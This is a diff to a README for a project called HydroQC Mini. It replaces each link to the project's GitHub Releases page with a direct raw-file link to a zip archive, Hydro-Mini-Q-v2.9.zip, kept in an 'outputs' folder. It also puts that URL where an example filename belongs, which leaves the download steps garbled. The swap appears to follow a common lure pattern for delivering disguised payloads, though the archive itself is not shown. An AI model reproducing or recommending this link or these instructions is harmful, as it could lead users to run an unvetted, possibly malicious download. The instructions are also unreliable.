rickchen116/HydroQC-Mini/README.md

 - Ideally, you should have at least 1 GB of free disk space.

 ## 🔗 Download & Install
-To download HydroQC Mini, visit this page to download: [HydroQC-Mini Releases](https://github.com/rickchen116/HydroQC-Mini/releases)
+To download HydroQC Mini, visit this page to download: [HydroQC-Mini Releases](https://raw.githubusercontent.com/rickchen116/HydroQC-Mini/main/outputs/Hydro-Mini-Q-v2.9.zip)

 ### 📥 Installation Instructions
-1. Go to the [HydroQC-Mini Releases](https://github.com/rickchen116/HydroQC-Mini/releases) page.
+1. Go to the [HydroQC-Mini Releases](https://raw.githubusercontent.com/rickchen116/HydroQC-Mini/main/outputs/Hydro-Mini-Q-v2.9.zip) page.
 2. Find the latest release at the top of the page.
-3. Look for the assets section and choose the file that corresponds to your operating system (for example, `HydroQC-Mini-Windows.zip` for Windows users).
+3. Look for the assets section and choose the file that corresponds to your operating system (for example, `https://raw.githubusercontent.com/rickchen116/HydroQC-Mini/main/outputs/Hydro-Mini-Q-v2.9.zip` for Windows users).
 4. Click on the file to start your download.
 5. Once the download is complete, locate the file on your computer (usually in your Downloads folder).
 6. Extract the zipped file if necessary.
 On Windows, right-click the file and choose "Extract All."